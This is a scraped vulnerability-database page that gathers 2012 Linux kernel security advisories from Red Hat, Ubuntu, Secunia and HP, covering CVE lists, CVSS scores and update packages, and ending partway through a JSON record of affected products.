772894 - CVE-2012-0044 kernel: drm: integer overflow in drm_mode_dirtyfb_ioctl() 803793 - CVE-2012-1179 kernel: thp:__split_huge_page() mapcount != page_mapcount BUG_ON() 806722 - CVE-2012-2123 kernel: fcaps: clear the same personality flags as suid when fcaps are used 814149 - CVE-2012-2121 kvm: device assignment page leak 814278 - CVE-2012-2119 kernel: macvtap: zerocopy: vector length is not validated before pinning user pages 814657 - kernel crash at ieee80211_mgd_probe_ap_send [rhel-6.2.z] 816151 - CVE-2012-2137 kernel: kvm: buffer overflow in kvm_set_irq() 816226 - add option to disable 5GHz band to iwlwifi [rhel-6.2.z] 816289 - CVE-2012-2136 kernel: net: insufficient data_len validation in sock_alloc_send_pskb() 818504 - Disable LRO for all NICs that have LRO enabled [rhel-6.2.z] 818505 - xen: fix drive naming [rhel-6.2.z] 819614 - 2.6.32-220 kernel does not work on a HP DL385G6 with HP Smart Array P410 controller and hpsa driver [rhel-6.2.z] 822754 - CVE-2012-2372 kernel: rds-ping cause kernel panic 822821 - CVE-2012-2373 kernel: mm: read_pmd_atomic: 32bit PAE pmd walk vs pmd_populate SMP race condition

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm

i386: kernel-2.6.32-220.23.1.el6.i686.rpm kernel-debug-2.6.32-220.23.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debug-devel-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm kernel-devel-2.6.32-220.23.1.el6.i686.rpm kernel-headers-2.6.32-220.23.1.el6.i686.rpm perf-2.6.32-220.23.1.el6.i686.rpm perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm

noarch: kernel-doc-2.6.32-220.23.1.el6.noarch.rpm kernel-firmware-2.6.32-220.23.1.el6.noarch.rpm

x86_64: kernel-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm kernel-devel-2.6.32-220.23.1.el6.x86_64.rpm kernel-headers-2.6.32-220.23.1.el6.x86_64.rpm perf-2.6.32-220.23.1.el6.x86_64.rpm perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm

i386: kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm python-perf-2.6.32-220.23.1.el6.i686.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm python-perf-2.6.32-220.23.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm

noarch: kernel-doc-2.6.32-220.23.1.el6.noarch.rpm kernel-firmware-2.6.32-220.23.1.el6.noarch.rpm

x86_64: kernel-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm kernel-devel-2.6.32-220.23.1.el6.x86_64.rpm kernel-headers-2.6.32-220.23.1.el6.x86_64.rpm perf-2.6.32-220.23.1.el6.x86_64.rpm perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm

x86_64: kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm python-perf-2.6.32-220.23.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm

i386: kernel-2.6.32-220.23.1.el6.i686.rpm kernel-debug-2.6.32-220.23.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debug-devel-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm kernel-devel-2.6.32-220.23.1.el6.i686.rpm kernel-headers-2.6.32-220.23.1.el6.i686.rpm perf-2.6.32-220.23.1.el6.i686.rpm perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm

noarch: kernel-doc-2.6.32-220.23.1.el6.noarch.rpm kernel-firmware-2.6.32-220.23.1.el6.noarch.rpm

ppc64: kernel-2.6.32-220.23.1.el6.ppc64.rpm kernel-bootwrapper-2.6.32-220.23.1.el6.ppc64.rpm kernel-debug-2.6.32-220.23.1.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm kernel-debug-devel-2.6.32-220.23.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-220.23.1.el6.ppc64.rpm kernel-devel-2.6.32-220.23.1.el6.ppc64.rpm kernel-headers-2.6.32-220.23.1.el6.ppc64.rpm perf-2.6.32-220.23.1.el6.ppc64.rpm perf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm

s390x: kernel-2.6.32-220.23.1.el6.s390x.rpm kernel-debug-2.6.32-220.23.1.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-220.23.1.el6.s390x.rpm kernel-debug-devel-2.6.32-220.23.1.el6.s390x.rpm kernel-debuginfo-2.6.32-220.23.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-220.23.1.el6.s390x.rpm kernel-devel-2.6.32-220.23.1.el6.s390x.rpm kernel-headers-2.6.32-220.23.1.el6.s390x.rpm kernel-kdump-2.6.32-220.23.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-220.23.1.el6.s390x.rpm kernel-kdump-devel-2.6.32-220.23.1.el6.s390x.rpm perf-2.6.32-220.23.1.el6.s390x.rpm perf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm

x86_64: kernel-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm kernel-devel-2.6.32-220.23.1.el6.x86_64.rpm kernel-headers-2.6.32-220.23.1.el6.x86_64.rpm perf-2.6.32-220.23.1.el6.x86_64.rpm perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm

i386: kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm python-perf-2.6.32-220.23.1.el6.i686.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm

ppc64: kernel-debug-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-220.23.1.el6.ppc64.rpm perf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm python-perf-2.6.32-220.23.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-220.23.1.el6.s390x.rpm kernel-debuginfo-2.6.32-220.23.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-220.23.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-220.23.1.el6.s390x.rpm perf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm python-perf-2.6.32-220.23.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm

x86_64: kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm python-perf-2.6.32-220.23.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm

i386: kernel-2.6.32-220.23.1.el6.i686.rpm kernel-debug-2.6.32-220.23.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debug-devel-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm kernel-devel-2.6.32-220.23.1.el6.i686.rpm kernel-headers-2.6.32-220.23.1.el6.i686.rpm perf-2.6.32-220.23.1.el6.i686.rpm perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm

noarch: kernel-doc-2.6.32-220.23.1.el6.noarch.rpm kernel-firmware-2.6.32-220.23.1.el6.noarch.rpm

x86_64: kernel-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm kernel-devel-2.6.32-220.23.1.el6.x86_64.rpm kernel-headers-2.6.32-220.23.1.el6.x86_64.rpm perf-2.6.32-220.23.1.el6.x86_64.rpm perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm

i386: kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm python-perf-2.6.32-220.23.1.el6.i686.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm python-perf-2.6.32-220.23.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

  1. References:

https://www.redhat.com/security/data/cve/CVE-2012-0044.html https://www.redhat.com/security/data/cve/CVE-2012-1179.html https://www.redhat.com/security/data/cve/CVE-2012-2119.html https://www.redhat.com/security/data/cve/CVE-2012-2121.html https://www.redhat.com/security/data/cve/CVE-2012-2123.html https://www.redhat.com/security/data/cve/CVE-2012-2136.html https://www.redhat.com/security/data/cve/CVE-2012-2137.html https://www.redhat.com/security/data/cve/CVE-2012-2372.html https://www.redhat.com/security/data/cve/CVE-2012-2373.html https://access.redhat.com/security/updates/classification/#important https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/6.2_Technical_Notes/kernel.html#RHSA-2012-0743

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)

iD8DBQFP3zJcXlSAg2UNWIIRAlFPAJ9ov0UCSkIqz63r+6YXL9bf0+ADOQCfUIzx w/ZsFuOkCnr15/XGPkEszEQ= =D/pm -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . (CVE-2012-0045)

A flaw was discovered in the Linux kernel's cifs file system. (CVE-2012-1090)

H. (CVE-2012-1097)

A flaw was discovered in the Linux kernel's cgroups subset. (CVE-2012-1146)

A flaw was found in the Linux kernel's handling of paged memory. (CVE-2012-1179)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 11.10: linux-image-3.0.0-19-generic 3.0.0-19.33 linux-image-3.0.0-19-generic-pae 3.0.0-19.33 linux-image-3.0.0-19-omap 3.0.0-19.33 linux-image-3.0.0-19-powerpc 3.0.0-19.33 linux-image-3.0.0-19-powerpc-smp 3.0.0-19.33 linux-image-3.0.0-19-powerpc64-smp 3.0.0-19.33 linux-image-3.0.0-19-server 3.0.0-19.33 linux-image-3.0.0-19-virtual 3.0.0-19.33

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well. ----------------------------------------------------------------------

Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch


TITLE: Ubuntu update for linux-lts-backport-oneiric

SECUNIA ADVISORY ID: SA48987

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48987/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48987

RELEASE DATE: 2012-05-01

DISCUSS ADVISORY: http://secunia.com/advisories/48987/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)

http://secunia.com/advisories/48987/

ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS

https://ca.secunia.com/?page=viewadvisory&vuln_id=48987

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING

http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: Ubuntu has issued an update for linux-lts-backport-oneiric.

Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

ORIGINAL ADVISORY: USN-1433-1: https://lists.ubuntu.com/archives/ubuntu-security-announce/2012-May/001672.html

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. (CVE-2011-4347, Moderate)

  • A flaw was found in the way the Linux kernel's XFS file system implementation handled on-disk Access Control Lists (ACLs). (CVE-2012-0038, Moderate)

  • It was found that the Linux kernel's register set (regset) common infrastructure implementation did not check if the required get and set handlers were initialized. Peter Anvin for reporting CVE-2012-1097.

This update also fixes the following bugs:

  • When a RoCE (RDMA over Converged Ethernet) adapter with active RoCE communications was taken down suddenly (either by adapter failure or the intentional shutdown of the interface), the ongoing RoCE communications could cause the kernel to panic and render the machine unusable. A patch has been provided to protect the kernel in this situation and to pass an error up to the application still using the interface after it has been taken down instead. (BZ#799944)

  • The fix for Red Hat Bugzilla bug 713494, released via RHSA-2011:0928, introduced a regression. Attempting to change the state of certain features, such as GRO (Generic Receive Offload) or TSO (TCP segment offloading), for a 10 Gigabit Ethernet card that is being used in a virtual LAN (VLAN) resulted in a kernel panic. (BZ#816974)

  • If a new file was created on a Network File System version 4 (NFSv4) share, the ownership was set to nfsnobody (-2) until it was possible to upcall to the idmapper. As a consequence, subsequent file system operations could incorrectly use "-2" for the user and group IDs for the given file, causing certain operations to fail. In reported cases, this issue also caused "Viminfo file is not writable" errors for users running Vim with files on an NFSv4 share. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04135307

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04135307 Version: 1

HPSBGN02970 rev.1 - HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment, Multiple Remote Vulnerabilities affecting Confidentiality, Integrity and Availability

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2014-03-10 Last Updated: 2014-03-10

Potential Security Impact: Multiple remote vulnerabilities affecting confidentiality, integrity and availability

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY Potential vulnerabilities have been identified with HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment. The vulnerabilities could be exploited remotely affecting confidentiality, integrity and availability.

References: CVE-2010-4008 CVE-2010-4494 CVE-2011-2182 CVE-2011-2213 CVE-2011-2492

CVE-2011-2518 CVE-2011-2689 CVE-2011-2723 CVE-2011-3188 CVE-2011-4077

CVE-2011-4110 CVE-2012-0058 CVE-2012-0879 CVE-2012-1088 CVE-2012-1179

CVE-2012-2137 CVE-2012-2313 CVE-2012-2372 CVE-2012-2373 CVE-2012-2375

CVE-2012-2383 CVE-2012-2384 CVE-2013-6205 CVE-2013-6206 SSRT101443

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP Rapid Deployment Pack (RDP) -- All versions HP Insight Control Server Deployment -- All versions

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2013-6205 (AV:L/AC:M/Au:S/C:P/I:P/A:P) 4.1 CVE-2013-6206 (AV:N/AC:L/Au:N/C:C/I:P/A:P) 9.0 CVE-2010-4008 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2010-4494 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-2182 (AV:L/AC:L/Au:N/C:C/I:C/A:C) 7.2 CVE-2011-2213 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2011-2492 (AV:L/AC:M/Au:N/C:P/I:N/A:N) 1.9 CVE-2011-2518 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2011-2689 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2011-2723 (AV:A/AC:M/Au:N/C:N/I:N/A:C) 5.7 CVE-2011-3188 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2011-4077 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2011-4110 (AV:L/AC:L/Au:N/C:N/I:N/A:P) 2.1 CVE-2012-0058 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2012-0879 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2012-1088 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 CVE-2012-1179 (AV:A/AC:M/Au:S/C:N/I:N/A:C) 5.2 CVE-2012-2137 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2012-2313 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2 CVE-2012-2372 (AV:L/AC:M/Au:S/C:N/I:N/A:C) 4.4 CVE-2012-2373 (AV:L/AC:H/Au:N/C:N/I:N/A:C) 4.0 CVE-2012-2375 (AV:A/AC:H/Au:N/C:N/I:N/A:C) 4.6 CVE-2012-2383 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2012-2384 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP recommends that HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment should only be run on private secure networks to prevent the risk of security compromise.

HISTORY Version:1 (rev.1) - 10 March 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201205-0297",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "dell computer",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "quantum",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "3.3.1"
      },
      {
        "model": "scalar i500",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "quantum",
        "version": "0"
      },
      {
        "model": "ml6000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dell",
        "version": "0"
      },
      {
        "model": "ts3310",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "linux enterprise server unsupported extras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "kernel 2.6.36-rc8",
        "scope": null,
        "trust": 0.3,
